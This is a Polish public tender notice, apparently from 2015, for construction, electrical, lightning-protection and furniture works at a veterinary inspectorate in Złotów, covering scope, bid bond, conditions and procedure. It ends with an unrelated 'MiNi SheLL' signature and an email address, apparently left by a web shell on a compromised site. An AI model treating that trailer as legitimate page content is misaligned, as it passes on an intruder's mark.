podtynkowych o średnicy do 80mm, mocowanych na zaprawie gipsowej lub cementowej, przy przekroju dołączanego przewodu i ilości wylotów: do 2,5mm2 - 3 wyloty, 4) montaż na gotowym podłożu puszek podtynkowych komputerowych, 5) przewody kabelkowe w izolacji polwinitowej układane p.t. na podłożu betonowym w gotowych bruzdach bez ich zaprawiania, 6) mechaniczne wykucie bruzd pod przewody wtynkowe w podłożu z betonu, 7) rury winidurowe układane p.t. w bruzdach na podłożu betonowym o średnicy ponad 20 do 28 mm, 8) przewody kabelkowe w powłoce polwinitowej wciągane do rur, 9) montaż na gotowym podłożu gniazd wtyczkowych: 3 f. 400V/16A (5pin) 10) montaż na gotowym podłożu gniazd wtyczkowych podtynkowych w puszkach - 2 bieg. z uz. 16A, 11) rury winidurowe układane p.t. w bruzdach na podłożu betonowym o średnicy ponad 20 do 28mm - pod przewody teletechniczne, 12) przewody teletechniczne wciągane do rur- analogia, 13) przewody kablowe w powłoce polwinitowej wciągane do rur, 14) mocowanie na gotowym podłożu z częściowym rozebraniem lecz bez podłączenia aparatów o masie do 2,5 kg - 4 otwory mocujące /wentylator/. 14. Wykonanie rozdzielni R2 i Rk-2 na piętrze wraz z zasilaniem: 1) mechaniczne wykucie bruzd pod przewody wtynkowe w podłożu z betonu, 2) rury winidurowe układane p.t. w gotowych bruzdach na podłożu betonowym o średnicy ponad 20 do 28mm, 3) przewody kabelkowe w powłoce polwinitowej wciągane do rur, 4) montaż rozdzielni R2 na piętrze, 5) montaż w rozdzielnicach skrzynkowych osprzętu modułowego: rozłączników 3-biegunowych FRX304 40A, 6) montaż w rozdzielnicach skrzynkowych osprzętu modułowego: wyłączniki nadprądowe 1-biegunowe S301 B10A, 7) montaż w rozdzielnicach skrzynkowych osprzętu modułowego: wyłączniki nadprądowe 1-biegunowe S301 C10A, 8) montaż w rozdzielnicach skrzynkowych osprzętu modułowego wyłącznik przeciwpor. 2-biegunowe P312 B16/30mA, 9) montaż w rozdzielnicach skrzynkowych osprzętu modułowego wyłącznik przeciwpor. 4-biegunowe P304 25A/30mA, 10) montaż w rozdzielnicach skrzynkowych osprzętu modułowego - lampka sygn.. potrójna, 11) montaż w rozdzielnicach skrzynkowych osprzętu modułowego: włącznik nadprądowy 3 - biegunowy S303 B20A, 12) montaż w rozdzielnicach skrzynkowych osprzętu modułowego: włączniki nadprądowe 1-biegunowe S301 B16A,  13) mechaniczne wykucie w podłożu betonowym wnęki o objętości ponad 0,10 do 0,25 dm3, 14) montaż rozdzielni Rk-2 na piętrze, 15) montaż w rozdzielnicach skrzynkowych osprzętu modułowego: rozłączników 3-biegunowych FRX304 40A, 16) montaż w rozdzielnicach skrzynkowych osprzętu modułowego: wyłączniki przeciwpor. 2-biegunowe P312 B16/30mA, 15. Montaż UPS 15-20kVA - wycena indywidualna zgodnie z DTR producenta 16. Wykonanie instalacji elektrycznej do podgrzewania rynien - wycena indywidualna zgodnie z DTR producenta 17. Wykonanie instalacji odgromowej 1) montaż zwodów instalacji odgromowej z przewodów nienaprężanych poziomych mocowanych na wspornikach obsadzanych, wykonanych z pręta stalowego ocynkowanego, 2) montaż zwodów instalacji odgromowej z przewodów nienaprężanych pionowych mocowanych na wspornikach obsadzanych, wykonanych z pręta stalowego ocynkowanego, 3) montaż przewodów uziemiających i wyrównawczych wykonanych z bednarki ocynkowanej o przekroju do 120 mm2 mocowanych na kołkach wstrzeliwanych, 4) montaż metodą udarową uziomu ze stali profilowanej miedziowanej w gruncie kat. III, długość uziomu 4,5m, 5) montaż metoda udarową uziomu ze stali profilowanej miedziowanej w gruncie kat. III za każde następne 1,5m długości uziomu, 6) montaż w instalacji odgromowej lub przewodach wyrównawczych złącza kontrolnego pręt - płaskownik, 7) montaż w instalacji odgromowej lub przewodach wyrównawczych złącza naprężającego na ścianie, 8) łączenie przewodów instalacji odgromowej lub przewodów wyrównawczych na dachu, rodzaj przewodu: pręt o średnicy do 10mm,  18. Przeprowadzenie prac regulacyjno - pomiarowych: 1) pomiar rezystancji izolacji instalacji elektrycznych: obwód 1-fazowy - pomiar pierwszy, 2) pomiar rezystancji izolacji instalacji elektrycznych: obwód 1-fazowy - pomiar każdy następny, 3) pomiar rezystancji izolacji instalacji elektrycznych: obwód 3-fazowy - pomiar pierwszy, 4) pomiar rezystancji izolacji instalacji elektrycznych: obwód 3-fazowy - pomiar każdy następny, 5) wykonanie próby zadziałania wyłącznika różnicowoprądowego - pierwsza, 6) wykonanie próby zadziałania wyłącznika różnicowoprądowego - następna, 7) sprawdzenie samoczynnego wyłączenia zasilania: pomiar impedancji pętli zwarciowej - pierwszy, 8) sprawdzenie samoczynnego wyłączenia zasilania: pomiar impedancji pętli zwarciowej - następny, 9) badania i pomiary instalacji odgromowej - pierwszy pomiar, 10) badania instalacji odgromowej - każdy następny pomiar, 11) badanie linii kablowej: niskiego napięcia - kabel 5 - żyłowy. 19. Wykonanie mebli pod zabudowę: 1) szafa drzwi przesuwne - 220x180x66, system jezdny aluminium, front łączony lacobel z laminatem, korpus płyta laminowana, wyposażenie półki i drążek - 5 sztuk, 2) zabudowa regałowa otwarta  270x80x50, korpus płyta laminowana - 18 sztuk, 3) regał z drzwiami przesuwnymi 550x270x50  system jezdny aluminium, front łączony lacobel z laminatem, korpus płyta laminowana, wyposażenie półki i drążek - 6 sztuk, 4) regał na akta wiszący drzwi przesuwne 250x90x46 - system jezdny aluminium, front łączony lacobel z laminatem, korpus płyta laminowana wyposażenie, półki - 1 sztuka, 5) drabina jezdna  aluminiowa, szeroko stopniowa 230x40 - 2 sztuki, 6) recepcja, korpus profilowany, laminowany dłu 550 wys.120, wyposażenie; biurko 76x130x70 z kontenerkiem (3 szuflady z dociągiem) półka na klawiaturę z dociągiem, regał na akta120x160x46  drzwi przesuwne system jezdny aluminium, front łączony lacobel z laminatem, korpus płyta laminowana, wyposażenie półki - 1 sztuka, 7) zabudowa meblowa kuchenna - 2,3 mb, 8) zabudowa meblowa kuchenna - 5 mb, 9) stół narożny profilowany noga chrom, materiał płyta laminowana - 1 sztuka, 10) garderoba z wieszakami 220x130, materiał płyta laminowana - 1 sztuka 11) blat roboczy laminowany  z wycięciami na zlew, łazienki - 6 mb. 20. Szczegółowy zakres rzeczowy dot. przedmiotu zamówienia określono w dokumentacjach projektowych, które dostępne są do wglądu w siedzibie Zamawiającego, tj. Powiatowy Inspektorat Weterynarii w Złotowie, ul. 8 Marca 5, 77-400 Złotów po uprzednim ustaleniu terminu z Panem Markiem Winiarskim tel. 515 138 900 lub 67 263 51 54,  specyfikacji technicznej wykonania i odbioru robót oraz przedmiarze robót, który stanowi element pomocniczy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.10.00-8, 45.11.13.00-1, 44.11.40.00-2, 44.11.41.00-3, 45.11.12.00-0, 45.26.22.10-6, 45.26.25.20-2, 45.31.00.00-3, 45.33.00.00-9, 45.33.11.00-7, 45.41.00.00-4, 45.42.10.00-4, 45.42.11.30-4, 45.44.42.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia przez Wykonawcę wadium w wysokości 30 000 zł - (słownie: trzydzieści tysięcy złotych 00/100 groszy). 
2. Wadium wnosi się przed upływem terminu składania ofert, tj. do 11.09.2015 roku                  do godziny 10.00.
3.	Wadium może być wnoszone w formach określonych w art. 45 ust. 6 ustawy Prawo zamówień publicznych. 
4. Wadium w pieniądzu należy wpłacić na następujący rachunek bankowy Zamawiającego: 
Powiatowy Inspektorat Weterynarii w Złotowie
ul. 8 Marca, 77-400 Złotów
Nr rachunku 95 2030 0045 1110 0000 0388 4700.
5. Dokument stanowiący dowód poświadczenia o wniesieniu wadium powinien zawierać tytuł wpłaty: Wadium - przetarg na roboty budowlane.
6. Dokument stanowiący poświadczenie wniesienia wadium Wykonawca powinien dołączyć do oferty.
7. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
8. Zasady zwrotu i zatrzymania wadium -zgodnie z zapisem art. 46 ustawy Prawo zamówień publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia warunku będzie przedstawienie oświadczenia stanowiącego załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia warunku będzie przedstawienie oświadczenia stanowiącego załącznik nr 2 do SIWZ oraz: 
a) Zamawiający wymaga, aby wykonawca wykazał, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał roboty/tę budowlane/ą o podobnym charakterze i zakresie do przedmiotu zamówienia na łączną wartość minimum 800 000,00 zł oraz załączeniem dowodów dotyczących wykazanych robót budowlanych, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia warunku będzie przedstawienie oświadczenia stanowiącego załącznik nr 2</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia warunku będzie przedstawienie oświadczenia stanowiącego załącznik nr 2 do SIWZ oraz wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, wg wzoru stanowiącego Załącznik nr 5 do SIWZ ;
Za spełniających warunek udziału w postępowaniu Zamawiający uzna Wykonawców, którzy wykażą, że dysponują osobami kierowników robót posiadających uprawnienia budowlane do pełnienia samodzielnej funkcji technicznej na budowie w poszczególnych branżach: 
1) instalacji elektrycznej,
2) instalacji sanitarnej - wodnokanalizacyjnej,
3)ogólnobudowlanej,
4) drogowej,
wydanymi na podstawie ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tj. Dz.U.                 z 2010r. nr 243 poz. 1623 z późn. zm.) lub odpowiednie, wydane na podstawie wcześniej obowiązujących przepisów.
Wykonawca zobowiązany jest złożyć oświadczenie (wg wzoru załączonego do SIWZ), że osoba, która będzie uczestniczyć w wykonywaniu zamówienia, o której mowa powyżej posiada wyżej wymagane uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia warunku będzie przedstawienie oświadczenia stanowiącego załącznik nr 2 do SIWZ oraz załączenie opłaconej polisy, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 1 000 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Wypełniony formularz oferty zgodnie ze wzorem stanowiącym Załącznik nr 1 do SIWZ;
b) Poświadczenie odbycia wizji lokalnej potwierdzone przez inwestora lub osobę przez niego wskazaną
c) Jeżeli reprezentacja/reprezentant Wykonawcy działa na podstawie pełnomocnictwa winien je przedstawić w formie oryginału;
d) Upoważnienie pełnomocnika (lidera) do reprezentowania Wykonawców postępowaniu i zawarciu umowy w przypadku oferty wspólnej (konsorcjum).
e) W przypadku gdy Wykonawca przy wykazywaniu warunków udziału w postępowaniu polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy PZP, zobowiązany jest udowodnić Zamawiającemu,                    iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Udowodnienie, o którym mowa powyżej powinno obejmować nie tylko wskazanie faktu udostępnienia określonych Wykonawcy zasobów przez podmiot trzeci, ale winno wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia, wskazywać jego rodzaj, czas udzielenia a także inne istotne okoliczności, w tym wynikające ze specyfiki tego zasobu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres udzielonej gwarancji na wykonane roboty budowlane w miesiącach - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Umowa może ulec zmianie w przypadku zaistnienia niżej wymienionych okoliczności: 
1) zmiana adresu/siedziby Zamawiającego/Wykonawcy oraz inne dane ujawnione w rejestrach publicznych;
2) opóźnienie w przekazaniu terenu robót;
3) przedłużenie procedury w sprawie udzielenia zamówienia publicznego;
4) opóźnienie spowodowane uwarunkowaniami społecznymi (protesty, listy, petycje, itp.);
5) zmiany stanu prawnego;
6) działania sił natury, uznanych za stan klęski żywiołowej.
Wyżej wymienione przypadki dokonania zmiany umowy, mogą między innymi rzutować na zmianę terminu wykonania przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zlotow-powiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Inspektorat Weterynarii w Złotowie, ul. 8 Marca 5, 77-400 Złotów, sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2015 godzina 10:00, miejsce: Powiatowy Inspektorat Weterynarii w Złotowie, ul. 8 Marca 5, 77-400 Złotów, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com